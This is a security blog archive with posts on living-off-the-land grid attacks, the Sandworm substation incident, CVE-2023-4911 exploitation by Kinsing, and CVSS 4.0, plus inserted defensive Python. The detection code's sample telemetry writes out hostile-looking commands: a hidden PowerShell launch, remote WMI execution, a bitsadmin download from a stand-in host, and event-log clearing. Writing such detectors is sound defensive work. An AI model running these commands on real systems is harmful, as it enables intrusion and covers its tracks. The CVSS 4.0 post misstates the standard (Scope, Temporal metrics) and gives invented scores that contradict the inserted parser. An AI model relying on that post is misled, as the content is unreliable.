Nov 13 2023

HOW LIVING-OFF-THE-LAND (LOTL) TECHNIQUE IS USED TO HACK INTO POWER GRIDS & CAUSE POWER OUTAGES

Category: Grid Vulnerabilities | disc7 @ 9:11 am

Living-off-the-land (LotL) techniques in cyber attacks refer to the use of legitimate, native tools already present in the target system to carry out malicious activities. This approach is particularly stealthy because it leverages tools and processes that are typically trusted and thus less likely to raise alarms. In the context of Operational Technology (OT) or Industrial Control Systems (ICS), such attacks can be especially dangerous due to the critical nature of the systems involved. Here’s how such an attack might work, with examples:

1. INITIAL ACCESS

  • Example: A phishing email is sent to an employee in the OT/ICS environment. The email contains a seemingly harmless document that, when opened, executes a PowerShell script (a native Windows tool) to create a backdoor.

2. LATERAL MOVEMENT

  • Example: Once inside the network, attackers might use legitimate system administration tools like Windows Management Instrumentation (WMI) or Remote Desktop Protocol (RDP) to move laterally across the network, searching for critical OT/ICS components.

3. ELEVATION OF PRIVILEGES

  • Example: Attackers might use built-in tools like Netstat to identify security software or firewall settings and then use other native scripts or commands to disable these defenses, or to elevate their access privileges within the system.

4. DISCOVERY AND INFORMATION GATHERING

  • Example: Tools like Tasklist or Systeminfo (native to Windows) are used to gather information about the system, such as running processes, installed software, or network configurations relevant to the OT/ICS environment.

5. EXPLOITATION AND MANIPULATION

  • Example: In an ICS environment, attackers might use standard industrial communication protocols like Modbus or DNP3 (which are legitimate and essential for normal operations) to send malicious commands to control systems, potentially disrupting physical processes like power generation or water treatment.

6. PERSISTENCE AND EXFILTRATION

  • Example: Attackers could use standard data transfer tools like FTP or even Windows BITS (Background Intelligent Transfer Service) to exfiltrate stolen data, or to maintain persistence by regularly updating malware or downloading additional tools.

7. CLEANUP

  • Example: To erase their tracks, attackers might use native cleanup tools or scripts to delete logs or any evidence of their activities, making detection and forensics much more difficult.
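The seven steps above map onto process-creation telemetry a defender can already collect. The Python below, added here and not part of the original post, runs a small rule set over constructed Sysmon-style records: a document viewer spawning a script host (step 1), WMI remote process creation (step 2), a burst of discovery tools on one host (step 4), BITS transfers (step 6) and event-log clearing (step 7). The field names and the sample hosts, paths and command lines are assumptions.

```python
"""Flag living-off-the-land process activity from process-creation records.

Rules correspond to the numbered steps above; the records are constructed to
resemble Sysmon Event ID 1 fields (field names are an assumption).
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple

@dataclass
class ProcEvent:
    host: str
    parent: str   # image path of the parent process
    image: str    # image path of the newly created process
    cmdline: str

def _base(path: str) -> str:
    """Lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe"}
RECON_TOOLS = {"tasklist.exe", "systeminfo.exe", "netstat.exe"}

def office_spawns_shell(e: ProcEvent) -> bool:
    """Step 1: a document viewer launching a script host."""
    return _base(e.parent) in OFFICE_APPS and _base(e.image) in SCRIPT_HOSTS

def wmi_remote_exec(e: ProcEvent) -> bool:
    """Step 2: WMI used to start a process on another host."""
    cl = e.cmdline.lower()
    return _base(e.image) == "wmic.exe" and "/node:" in cl and "process call create" in cl

def bits_transfer(e: ProcEvent) -> bool:
    """Step 6: a BITS job moving files onto or off the host."""
    return (_base(e.image) == "bitsadmin.exe"
            and re.search(r"/(transfer|addfile|setnotifycmdline)\b", e.cmdline, re.I) is not None)

def log_clearing(e: ProcEvent) -> bool:
    """Step 7: native tooling used to wipe an event log."""
    return (_base(e.image) == "wevtutil.exe"
            and re.search(r"\s(cl|clear-log)\s", f" {e.cmdline} ", re.I) is not None)

EVENT_RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("office_spawns_shell", office_spawns_shell),
    ("wmi_remote_exec", wmi_remote_exec),
    ("bits_transfer", bits_transfer),
    ("log_clearing", log_clearing),
]

def detect(events: List[ProcEvent], recon_threshold: int = 3) -> List[Tuple[str, str, str]]:
    """Return (host, rule, detail) findings.

    Besides the per-event rules, a host on which at least recon_threshold distinct
    discovery tools ran (step 4) is reported once as recon_burst; a lone tasklist
    run by an operator is not worth an alert on its own.
    """
    findings: List[Tuple[str, str, str]] = []
    recon_seen: Dict[str, Set[str]] = defaultdict(set)
    for e in events:
        for name, rule in EVENT_RULES:
            if rule(e):
                findings.append((e.host, name, e.cmdline))
        if _base(e.image) in RECON_TOOLS:
            recon_seen[e.host].add(_base(e.image))
    for host, tools in recon_seen.items():
        if len(tools) >= recon_threshold:
            findings.append((host, "recon_burst", ",".join(sorted(tools))))
    return findings

# Constructed sample telemetry; hosts, paths and command lines are invented.
SAMPLE_EVENTS = [
    ProcEvent("ENG-WS01", r"C:\Program Files\Microsoft Office\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"),
    ProcEvent("ENG-WS01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wbem\WMIC.exe",
              'wmic.exe /node:HMI-02 process call create "notepad.exe"'),
    ProcEvent("HMI-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\tasklist.exe", "tasklist.exe /v"),
    ProcEvent("HMI-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\systeminfo.exe", "systeminfo.exe"),
    ProcEvent("HMI-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\NETSTAT.EXE", "netstat.exe -ano"),
    ProcEvent("HMI-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin.exe /transfer job1 http://files.example/a.bin C:\Users\Public\a.bin"),
    ProcEvent("HMI-02", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\wevtutil.exe", "wevtutil.exe cl Security"),
    # Benign noise: an operator opens Notepad and lists tasks once.
    ProcEvent("OPS-WS07", r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
    ProcEvent("OPS-WS07", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\tasklist.exe", "tasklist.exe"),
]

if __name__ == "__main__":
    for host, rule, detail in detect(SAMPLE_EVENTS):
        print(f"{host:9} {rule:20} {detail}")
```

In a real deployment the same rules would be applied to the SIEM's process-creation feed; the thresholds here are starting points to tune against the site's baseline.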

In late 2022, a significant cyber-physical incident occurred in Ukraine, attributed to the Russia-linked threat actor Sandworm. This event targeted Ukrainian critical infrastructure and utilized a multi-event cyber attack strategy, incorporating innovative techniques to impact industrial control systems (ICS) and operational technology (OT). The Sandworm actor employed OT-level living-off-the-land (LotL) techniques, likely causing a substation’s circuit breakers to trip and resulting in an unplanned power outage. This outage coincided with mass missile strikes across Ukraine’s critical infrastructure. Additionally, Sandworm executed a second disruptive event by deploying a new variant of CADDYWIPER malware in the victim’s IT environment.

This attack exemplifies the latest advancements in Russia’s cyber-physical attack capabilities, particularly visible since Russia’s invasion of Ukraine. The techniques used indicate a maturing offensive OT arsenal, capable of identifying novel OT threat vectors, developing new capabilities, and leveraging various types of OT infrastructure for attacks. Utilizing LotL techniques likely reduced the time and resources required for the cyber-physical attack. Although the initial intrusion point remains undetermined, the rapid development of the OT component of this attack suggests the actor’s ability to swiftly create similar capabilities against other OT systems globally.

Sandworm, active since at least 2009, is a versatile threat actor conducting espionage, influence, and attack operations, primarily supporting Russia’s Main Intelligence Directorate (GRU). The group’s primary focus has been Ukraine, where it has orchestrated disruptive and destructive attacks using wiper malware, especially during Russia’s re-invasion in 2022. However, Sandworm’s activities extend globally, underlining the Russian military’s extensive ambitions and interests in various regions. The group’s global threat activity and novel OT capabilities necessitate proactive measures from OT asset owners to mitigate potential risks.

According to Mandiant research, the 2022 intrusion began on or prior to June 2022, culminating in two disruptive events on October 10 and 12. Sandworm accessed the OT environment via a hypervisor hosting a SCADA management instance for a substation, potentially having SCADA system access for up to three months. On October 10, Sandworm used an optical disc (ISO) image, “a.iso,” to execute a native MicroSCADA binary, likely for malicious control commands to switch off substations. In plainer terms, the attackers got into the operational technology (OT) system through a key piece of software (a hypervisor) that managed the control system (SCADA) of a power substation, which means they had access to the system that controls how the substation works. For up to three months they could have been inside this system without being detected. On October 10 they used a special file (an ISO image named “a.iso”) to run a command in the control system that was likely intended to turn off power substations.

This case underscores the evolving nature of cyber threats, particularly in critical infrastructure sectors. The increasing sophistication and rapid development of such attacks highlight the need for enhanced cybersecurity measures, continuous monitoring, and preparedness against novel and complex cyber threats in OT and ICS environments.

In OT/ICS environments, such LotL attacks are particularly concerning because they:

  • Are harder to detect due to the use of legitimate tools.
  • Can cause significant physical and operational damage.
  • May bypass traditional security measures that don’t account for malicious use of native tools.

Defending against such attacks requires a combination of robust cybersecurity practices, including employee training, network segmentation, constant monitoring for anomalous behaviors, and regular updating and patching of all systems.


InfoSec tools | InfoSec services | InfoSec books | Follow our blog | DISC llc is listed on The vCISO Directory

Tags: Grid Vulnerabilities, Power grid vulnerabilities


Nov 10 2023


Russian Hackers Hijacked Power Station Circuit Breakers Using LotL Technique

Category: Hacking, Information Security | disc7 @ 11:10 am

In a recent and alarming development, the notorious Russia-linked threat actor Sandworm executed a sophisticated cyber-physical attack targeting a critical infrastructure organization in Ukraine. 

The incident, responded to by cybersecurity firm Mandiant, unfolded as a multi-event assault, showcasing a novel technique to impact industrial control systems (ICS) and operational technology (OT).

Unraveling Russia’s Cyber-Physical Capabilities

The attack, spanning from June to October 2022, demonstrated a significant evolution in Russia’s cyber-physical attack capabilities, notably visible since the invasion of Ukraine. 

Sandworm, known for its allegiance to Russia’s Main Intelligence Directorate (GRU), has historically focused on disruptive and destructive campaigns, particularly in Ukraine.

The unique aspect of this attack involved Sandworm’s utilization of living-off-the-land (LotL) techniques at the OT level, initially causing an unplanned power outage in conjunction with missile strikes across Ukraine. 

The threat actor further demonstrated its adaptability by deploying a new variant of the CADDYWIPER malware in the victim’s IT environment.

Mandiant’s analysis revealed the complexity of the attack, highlighting Sandworm’s ability to recognize novel OT threat vectors, develop new capabilities, and exploit various OT infrastructures. 

The threat actor’s deployment of LotL techniques indicated a streamlined approach, reducing the time and resources required for the cyber-physical assault.

Concerns Over Sandworm’s Adaptive Capabilities

Despite being unable to pinpoint the initial intrusion point, Mandiant suggested that the OT component of the attack may have been developed in as little as two months. 

This raises concerns about Sandworm’s capability to rapidly adapt and deploy similar attacks against diverse OT systems worldwide.

Sandworm’s global threat activity, coupled with its novel OT capabilities, prompted a call to action for OT asset owners worldwide. 

Mandiant provided detailed guidance, including detection methods, hunting strategies, and recommendations for hardening systems against such threats.

The attack’s timing, coinciding with Russian kinetic operations, suggested a strategic synchronization, indicating that the threat actor may have been waiting for a specific moment to deploy its capabilities. 

As observed in this incident, the evolution of Sandworm’s tactics offers insights into Russia’s ongoing investment in OT-oriented offensive cyber capabilities.

In conclusion, this Sandworm attack serves as a stark reminder of the escalating cyber threats faced by critical infrastructure globally. 

The continuous evolution of cyber adversaries necessitates a proactive approach from governments, organizations, and asset owners to secure and safeguard vital systems against such sophisticated attacks.


Tags: Power station, Sandworm


Nov 09 2023

NordVPN safe and private access to the internet

Category: VPN | disc7 @ 9:56 pm

Protect your online activity

If you are not using a reliable VPN, your private information can be easily accessed by third parties. Get NordVPN to protect yourself from prying eyes.

Next-generation encryption

Connect to a VPN server and be sure that NordVPN’s cutting-edge AES-256 encryption keeps your online data safe, even on public Wi-Fi.

Malware protection

Enjoy a higher level of security with NordVPN’s Threat Protection feature. Scan downloads for malware, block trackers, and hide ads.


Tags: NordVPN


Nov 09 2023

HACKERS’ NEW FAVORITE: CVE-2023-4911 TARGETING DEBIAN, UBUNTU AND FEDORA SERVERS IN THE CLOUD

Category: Linux Security | disc7 @ 7:51 am

CVE-2023-4911 is a serious security vulnerability within the GNU C Library (glibc), specifically in the dynamic loader ld.so, associated with the processing of the GLIBC_TUNABLES environment variable. This vulnerability has been exploited in cloud attacks, particularly by a group using the Kinsing malware for cryptojacking operations.

The flaw is a buffer overflow that can be exploited by a local attacker using specially crafted GLIBC_TUNABLES environment variables when launching binaries with Set-UID (SUID) permissions, which could potentially allow the execution of code with elevated privileges. The Qualys Threat Research Unit has been credited with discovering this vulnerability.

This vulnerability has been given a severity score of 7.8, which classifies it as high severity. Exploitation of this flaw could enable an attacker to gain root permission on a Linux system that is running a vulnerable version of GLIBC, specifically version 2.34 or similar.

The issue has been noted to impact major Linux distributions, and organizations that use Linux systems, especially in cloud environments, are advised to patch this vulnerability promptly to mitigate the risks associated with it.

Exploit

To exploit CVE-2023-4911, threat actors would typically follow a sequence of steps that hinge on local access to a vulnerable system. The exploitation process can generally be broken down into the following stages:

  1. Initial Access: First, the attacker needs local access to a system that runs a vulnerable version of the GNU C Library, specifically where ld.so is affected by the buffer overflow. This access could be obtained through various means, such as compromising a low-privileged user account.
  2. Crafting Malicious Input: The attacker crafts a malicious GLIBC_TUNABLES environment variable. This variable is meant to be used for tuning performance and behavior aspects of the GNU C Library, but when crafted maliciously, it can trigger a buffer overflow.
  3. Exploiting the Buffer Overflow: By triggering the buffer overflow, the attacker aims to overwrite certain areas of memory. This could be the stack, the heap, or other memory locations, depending on how the dynamic loader (ld.so) is handling the environment variable.
  4. Injecting Code or Redirecting Execution: The overwritten memory could include the injection of malicious code, or it might alter the execution flow of the process to jump to code that the attacker controls. Typically, this would be shellcode—a small piece of code that launches a shell or another control mechanism.
  5. Elevating Privileges: If the process being exploited has SUID permissions, it runs with the privileges of the owner of the file, often root. By exploiting such a process, the attacker can execute their code with elevated privileges, effectively gaining root access to the system.

Here’s a hypothetical example:

  • Alice is a system administrator for a cloud service provider that uses Linux servers.
  • Bob is a threat actor who has managed to gain access to a low-privileged account on one of the Linux servers due to a weak password.
  • The server runs a version of GLIBC that is vulnerable to CVE-2023-4911.
  • Bob writes a malicious GLIBC_TUNABLES variable and uses it in conjunction with a vulnerable application that has SUID set to run as root.
  • When the application runs, the malicious variable causes a buffer overflow in ld.so, which Bob exploits to redirect the application’s execution flow to his shellcode.
  • Bob’s shellcode is executed with root privileges, giving him full control over the server.
  • Now with root access, Bob could install persistent backdoors, exfiltrate data, or use the compromised server for further attacks.

It’s important to note that exploitation of CVE-2023-4911, like many vulnerabilities, requires specific conditions to be met and often sophisticated knowledge of software internals, memory layout, and exploitation techniques. The exact details of the exploit can vary based on the system’s configuration, the attacker’s goals, and the environment variables involved.

The Aqua Nautilus team documented an attack by the Kinsing malware that exploited CVE-2023-4911 to elevate permissions on a compromised machine. Here’s how they described the exploitation process:

  1. Initial Access: The attackers gained initial access by exploiting a PHPUnit vulnerability (CVE-2017-9841), allowing them to download and execute a Perl script to open a reverse shell on the compromised machine.
  2. Manual Testing: The Kinsing attackers manually tested shell commands on the compromised systems. These commands included gathering system information, starting an interactive shell session, and creating a directory in /tmp.
  3. Downloading Exploits: They downloaded a script named gnu-acme.py, which was an exploit for the Looney Tunables vulnerability (CVE-2023-4911), allowing for local privilege escalation by exploiting a buffer overflow in the handling of the GLIBC_TUNABLES environment variable by ld.so.
  4. Executing Additional Exploits: After this, they fetched and executed an obfuscated PHP exploit, which, upon de-obfuscation, turned out to be a JavaScript designed for further exploitative activities. This resulted in a web shell backdoor that allowed them to maintain unauthorized access to the server.

This attack demonstrates the attackers’ sophisticated capabilities in chaining vulnerabilities to penetrate cloud environments, gain unauthorized access, and elevate privileges within the system.

Kinsing aims to gather CSP credentials, potentially exposing sensitive data, like AWS instance identity, which poses risks in cloud environments.

The following types of credentials and data could be exposed:

  • Temporary Security Credentials
  • IAM Role Credentials
  • Instance Identity Tokens

Mitigation

To mitigate an attack exploiting CVE-2023-4911, you should take the following steps:

  1. Patch the Vulnerability: Update the GNU C Library (glibc) to the latest version that includes a fix for CVE-2023-4911.
  2. Limit Access: Restrict local access to essential personnel and services, minimizing the number of users who can potentially exploit the vulnerability.
  3. Monitor for Suspicious Activity: Implement monitoring tools to detect unusual activity, such as unexpected changes to environment variables or unauthorized processes trying to gain elevated privileges.
  4. Harden Your Environment: Follow best practices for system hardening, such as disabling unnecessary services, closing open ports, and using tools like SELinux or AppArmor for enhanced security.
  5. Regular Security Audits: Conduct regular security audits to identify and remediate misconfigurations or unnecessary privileges that could be exploited.
  6. Use Security Tools: Employ security solutions such as intrusion detection systems, firewalls, and anti-malware tools that can detect and prevent exploitation attempts.
  7. Educate Staff: Train staff to recognize phishing attempts and other forms of social engineering that could lead to local access being compromised.
  8. Incident Response Plan: Have an incident response plan in place that includes procedures for dealing with suspected breaches, including how to contain and eradicate threats.
  9. Backup Regularly: Maintain regular backups of critical data to ensure that you can restore systems to a secure state if necessary.

By following these steps, you can significantly reduce the risk of exploitation and mitigate potential damage from attacks like those involving CVE-2023-4911.
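Mitigation step 3 asks for monitoring of unexpected environment-variable use. The Python below, added as an example and not part of the original post, reads GLIBC_TUNABLES from each process's /proc/<pid>/environ, flags values that no legitimate tuning string should have, and records whether the executable is set-user-ID (the condition under which the ld.so flaw yields elevated privileges). The length limit and shape rules are defensive assumptions, and the sample environments are constructed.

```python
"""Hunt for abnormal GLIBC_TUNABLES settings in the environments of running processes.

The length limit and shape rules are defensive assumptions about legitimate
tuning strings, not the vulnerability's exact trigger conditions.
"""
import os
import stat
from typing import Dict, List

MAX_SANE_TUNABLES_LEN = 256   # assumption: real tuning strings are far shorter

def parse_environ(blob: bytes) -> Dict[str, str]:
    """Split the NUL-separated contents of /proc/<pid>/environ into a dict."""
    env: Dict[str, str] = {}
    for entry in blob.split(b"\0"):
        key, sep, value = entry.partition(b"=")
        if sep:
            env[key.decode("latin-1")] = value.decode("latin-1")
    return env

def tunables_findings(value: str) -> List[str]:
    """Return the reasons a GLIBC_TUNABLES value looks abnormal (empty if it looks sane).

    Legitimate values are colon-separated name=value pairs whose names live in the
    glibc.* namespace, e.g. glibc.malloc.mxfast=64:glibc.malloc.tcache_count=4.
    """
    reasons: List[str] = []
    if len(value) > MAX_SANE_TUNABLES_LEN:
        reasons.append(f"value length {len(value)} exceeds {MAX_SANE_TUNABLES_LEN}")
    for pair in filter(None, value.split(":")):
        name, sep, rest = pair.partition("=")
        if not sep:
            reasons.append(f"entry without '=': {pair[:40]!r}")
            continue
        if not name.startswith("glibc."):
            reasons.append(f"unknown tunable namespace: {name[:40]!r}")
        if "=" in rest:
            reasons.append(f"nested '=' in value of {name[:40]!r}")
        if any(not 32 <= ord(c) < 127 for c in rest):
            reasons.append(f"non-printable bytes in value of {name[:40]!r}")
    return reasons

def scan_proc(proc_root: str = "/proc") -> List[dict]:
    """Report processes whose environment carries an abnormal GLIBC_TUNABLES.

    Each hit records whether the executable is set-user-ID. Processes the caller
    may not inspect (or that exit mid-scan) are skipped silently.
    """
    hits: List[dict] = []
    try:
        pids = [p for p in os.listdir(proc_root) if p.isdigit()]
    except OSError:
        return hits
    for pid in pids:
        try:
            with open(os.path.join(proc_root, pid, "environ"), "rb") as fh:
                env = parse_environ(fh.read())
            exe = os.readlink(os.path.join(proc_root, pid, "exe"))
            is_suid = bool(os.stat(exe).st_mode & stat.S_ISUID)
        except OSError:
            continue
        value = env.get("GLIBC_TUNABLES")
        if value is None:
            continue
        reasons = tunables_findings(value)
        if reasons:
            hits.append({"pid": int(pid), "exe": exe, "suid": is_suid, "reasons": reasons})
    return hits

# Constructed sample environments in the byte layout of /proc/<pid>/environ.
BENIGN_ENVIRON = b"PATH=/usr/bin\0GLIBC_TUNABLES=glibc.malloc.mxfast=64:glibc.malloc.tcache_count=4\0"
ABNORMAL_ENVIRON = b"PATH=/usr/bin\0GLIBC_TUNABLES=glibc.malloc.mxfast=" + b"A" * 1000 + b"\0"

if __name__ == "__main__":
    for sample in (BENIGN_ENVIRON, ABNORMAL_ENVIRON):
        print(tunables_findings(parse_environ(sample)["GLIBC_TUNABLES"]) or "looks sane")
    for hit in scan_proc():
        print(hit)
```

Run as root (or with CAP_SYS_PTRACE) to read other users' environments; patching glibc remains the fix, this only shortens the time an attempt goes unnoticed.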


Tags: DEBIAN, Mastering Linux Security and Hardening, UBUNTU AND FEDORA


Nov 06 2023

Cloud security guidance

Category: Cloud computing | disc7 @ 9:52 am

How to choose, configure and use cloud services securely.

If you want to store and process data in the cloud, or use cloud platforms to build and host your own services, this guidance will help you do so securely.

Cloud usage continues to grow steadily, both in volume and the type of services being built and hosted in it. In fact, cloud is usually the preferred option when organisations procure new IT services, as reflected in the UK government’s Cloud First Policy.

Against this background, it’s essential that new services are chosen and built in a way which reflects their security needs.


Who is this guidance for?

All organisations can use this guidance to navigate the sometimes confusing array of technologies which make up ‘the cloud’, and the management models which underpin their use.

More particularly:

Note:

Individuals looking for advice about how to use online services securely should refer to our Cyber Aware advice on staying secure online.


This collection contains

Introduction to cloud security

Defining some common terms, and providing background on the various sections of this guide.

Understanding cloud services

Cloud services can be seen from a number of perspectives. This section considers:

  • service models and deployment models
  • the ‘shared responsibility model’ used by many cloud providers to handle day-to-day management of security
  • two specific security techniques; separation and cryptography

Choosing a cloud provider

The cloud security principles and how to use them, along with our lightweight security framework and some vendor responses to the principles.

Using cloud services securely

Some actions that customers of cloud services will need to take. This includes advice for cloud platforms and software as a service (SaaS), and those looking to lift and shift into the cloud.


https://www.ncsc.gov.uk/collection/cloud


Tags: cloud security


Nov 03 2023

OWASP API Security Top 10 2023

Category: API security | disc7 @ 10:34 am



If you want to learn more, you can check the link below

Understanding API Security and Implications


Tags: API Security, OWASP Top 10


Nov 02 2023

CVSS 4.0 EXPLAINED: FROM COMPLEXITY TO CLARITY IN VULNERABILITY ASSESSMENT

Category: Security vulnerabilities | disc7 @ 4:07 pm

The Common Vulnerability Scoring System (CVSS) has been updated to version 4.0, which has been formally announced by the Forum of Incident Response and Security Teams (FIRST). This update comes eight years after the debut of CVSS v3.0, the previous version of the system. At its 35th annual conference, which took place in June in Montreal, Canada, FIRST presented CVSS 4.0 to the attendees. The Common Vulnerability Scoring System, also known as CVSS, is a standardised framework for evaluating the severity of software vulnerabilities. It does this by assigning numerical scores or qualitative labels (such as low, medium, high, and critical) based on factors such as exploitability, impact on confidentiality, integrity, availability, and required privileges, with higher scores indicating more severe vulnerabilities.

The Common Vulnerability Scoring System, more often referred to as CVSS, is a methodology that provides a framework for evaluating and conveying the severity of software vulnerabilities. It offers a standardised way that organisations and security experts may use to analyse vulnerabilities based on the characteristics of the vulnerabilities, and then prioritise those vulnerabilities. The CVSS ratings provide assistance in making educated judgements on which vulnerabilities should be addressed first and how resources should be distributed for vulnerability management.

There have been several versions of CVSS, and each version has included enhancements and modifications that make it possible to more accurately evaluate the severity of vulnerabilities. The previous version, CVSS 3.1, has been upgraded to the current version, CVSS 4.0, which includes a number of significant updates and enhancements, including the following:

Simplified Scoring: CVSS 4.0 has been designed with the goal of simplifying the scoring system and making it more accessible to users. It makes the scoring process more straightforward, which makes it simpler for security experts to grasp and put into practice.

Accurate Scoring: CVSS 4.0 includes enhancements in scoring to enable more accurate evaluations of vulnerabilities. These improvements were made possible by the introduction of new scoring methods. It improves the base, temporal, and environmental parameters such that a more accurate representation of the real effect of a vulnerability may be achieved.

Enhanced Metrics: It provides new metrics, such as Scope and Attack Vector, to offer more insight into the nature of the vulnerability and its effect on the system.

Formula: CVSS 4.0 comes with a revised formula that may be used to determine the total score on the CVSS scale. When paired with additional indicators, this formula provides a more accurate representation of the severity of vulnerabilities.

Contextual Information: When rating vulnerabilities, CVSS 4.0 strongly recommends making use of any available contextual information. This helps produce a vulnerability assessment that is more precise and relevant to the particular deployment circumstances.

Increased Scoring Flexibility: The updated version offers an increased degree of scoring flexibility for vulnerabilities. Users are given the option to choose several temporal and environmental criteria, so that the data may more accurately represent their unique situations.

The Common Vulnerability Scoring System (CVSS) version 4.0 marks an advancement in vulnerability scoring and addresses some of the limitations that were present in prior versions. It seeks to offer a system for analysing and prioritising vulnerabilities that is both more accurate and easier to use, with the ultimate goal of assisting organisations in improving their security posture by concentrating on the most pressing problems. In order to improve their vulnerability management procedures, security professionals and organisations should become familiar with CVSS 4.0 and consider implementing it.

Let’s take an example of how you would use CVSS 4.0 to determine the severity of a software vulnerability. For the sake of this example, we will use a made-up vulnerability:

Vulnerability Description: An application contains a buffer overflow vulnerability, which an attacker can exploit to execute arbitrary code on the affected system.

Here’s how you would use CVSS 4.0 to assess the severity of this vulnerability:

Base Metrics:

  • Attack Vector (AV): The vulnerability can be exploited via network (AV:N). The attacker does not need local access to the system.
  • Attack Complexity (AC): The attack requires no special conditions (AC:LOW). It’s relatively easy to exploit.
  • Privileges Required (PR): The attacker needs to gain elevated privileges (PR:HIGH). This makes it more challenging to exploit.
  • User Interaction (UI): No user interaction is required (UI:NONE).
  • Scope (S): The scope of the vulnerability is unchanged, and it doesn’t impact other components (S:UNCHANGED).

Temporal Metrics:

  • Exploit Code Maturity (E): There is proof of concept code available, but no known exploits in the wild (E:POC).
  • Remediation Level (RL): There is an official fix available (RL:OFFICIAL-FIX).
  • Report Confidence (RC): The vulnerability has been confirmed by multiple sources (RC:HIGH).

Environmental Metrics (Specific to the organization’s setup):

  • Modified Attack Vector (MAV): The organization’s security controls have made it harder for attackers to exploit this vulnerability (MAV:NETWORK).
  • Modified Attack Complexity (MAC): The organization’s security measures have increased the difficulty of exploitation (MAC:HIGH).
  • Modified Privileges Required (MPR): The organization’s security settings require lower privileges for successful exploitation (MPR:LOW).

Now, you can calculate the CVSS 4.0 score based on these metrics:

  1. Calculate the Base Score: In this case, it might be, for example, 7.8.
  2. Calculate the Temporal Score by considering the temporal metrics: Let’s say it’s 6.2.
  3. Calculate the Environmental Score, taking into account the environmental metrics and organization-specific factors: The final score might be 4.3.

The overall CVSS 4.0 score for this vulnerability would be the Environmental Score, which is 4.3 in this example. This score helps organizations understand the severity of the vulnerability in their specific context, considering the mitigations and configurations in place.

The higher the CVSS score, the more severe the vulnerability. Organizations can then prioritize addressing vulnerabilities with higher scores to improve their security posture. CVSS 4.0 offers more flexibility and a better representation of the vulnerability’s impact, taking into account various contextual factors.
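CVSS 4.0 vector strings, as published by FIRST, carry four metric groups (Base, Threat, Environmental and Supplemental) and are named CVSS-B, CVSS-BT, CVSS-BE or CVSS-BTE according to which groups are populated. The Python below is an added example, not part of the original post: it validates a 4.0 vector string against that grammar and reports its nomenclature, using constructed vectors that mirror the post's example (network reachable, low complexity, high privileges, no user interaction). No numeric score is computed.

```python
"""Validate a CVSS 4.0 vector string and name the metric groups it carries.

Metric names and allowed values follow the CVSS v4.0 specification (FIRST).
No numeric score is computed: 4.0 scoring rests on MacroVector lookup tables
that are far larger than this example.
"""
from typing import Dict, Tuple

PREFIX = "CVSS:4.0"

# Base metrics are mandatory and must appear in this order.
BASE: Dict[str, Tuple[str, ...]] = {
    "AV": tuple("NALP"), "AC": tuple("LH"), "AT": tuple("NP"), "PR": tuple("NLH"),
    "UI": tuple("NPA"), "VC": tuple("HLN"), "VI": tuple("HLN"), "VA": tuple("HLN"),
    "SC": tuple("HLN"), "SI": tuple("HLN"), "SA": tuple("HLN"),
}
# The Threat group replaces the Temporal group of earlier CVSS versions.
THREAT: Dict[str, Tuple[str, ...]] = {"E": tuple("XAPU")}
ENVIRONMENTAL: Dict[str, Tuple[str, ...]] = {
    "CR": tuple("XHML"), "IR": tuple("XHML"), "AR": tuple("XHML"),
    "MAV": tuple("XNALP"), "MAC": tuple("XLH"), "MAT": tuple("XNP"), "MPR": tuple("XNLH"),
    "MUI": tuple("XNPA"), "MVC": tuple("XHLN"), "MVI": tuple("XHLN"), "MVA": tuple("XHLN"),
    "MSC": tuple("XHLN"), "MSI": tuple("XSHLN"), "MSA": tuple("XSHLN"),
}
# Supplemental metrics add context but never change the score.
SUPPLEMENTAL: Dict[str, Tuple[str, ...]] = {
    "S": tuple("XNP"), "AU": tuple("XNY"), "R": tuple("XAUI"), "V": tuple("XDC"),
    "RE": tuple("XLMH"), "U": ("X", "Clear", "Green", "Amber", "Red"),
}
ALL_METRICS = {**BASE, **THREAT, **ENVIRONMENTAL, **SUPPLEMENTAL}

def parse_vector(vector: str) -> Dict[str, str]:
    """Parse a vector string; raise ValueError naming the first defect found."""
    parts = vector.split("/")
    if parts[0] != PREFIX:
        raise ValueError(f"vector must start with {PREFIX}/")
    metrics: Dict[str, str] = {}
    for part in parts[1:]:
        name, sep, value = part.partition(":")
        if not sep:
            raise ValueError(f"malformed metric {part!r}")
        if name not in ALL_METRICS:
            raise ValueError(f"unknown metric {name!r}")
        if name in metrics:
            raise ValueError(f"duplicate metric {name}")
        if value not in ALL_METRICS[name]:
            raise ValueError(f"invalid value {value!r} for {name}")
        metrics[name] = value
    if [m for m in metrics if m in BASE] != list(BASE):
        raise ValueError("all Base metrics are required, in specification order")
    return metrics

def is_valid(vector: str) -> bool:
    """True if the vector string parses under the rules above."""
    try:
        parse_vector(vector)
    except ValueError:
        return False
    return True

def nomenclature(metrics: Dict[str, str]) -> str:
    """CVSS-B, CVSS-BT, CVSS-BE or CVSS-BTE, per the 4.0 naming rules.

    A group counts only when at least one of its metrics is set to a value
    other than X (Not Defined); Supplemental metrics never affect the name.
    """
    has_t = any(metrics.get(m, "X") != "X" for m in THREAT)
    has_e = any(metrics.get(m, "X") != "X" for m in ENVIRONMENTAL)
    return "CVSS-B" + ("T" if has_t else "") + ("E" if has_e else "")

def assess(vector: str) -> Tuple[str, Dict[str, str]]:
    """(nomenclature, parsed metrics) for a vector string."""
    metrics = parse_vector(vector)
    return nomenclature(metrics), metrics

# Constructed vectors mirroring the post's example (network reachable, low
# complexity, high privileges, no user interaction): Base-only, then with a
# Threat metric and two Environmental modifications added.
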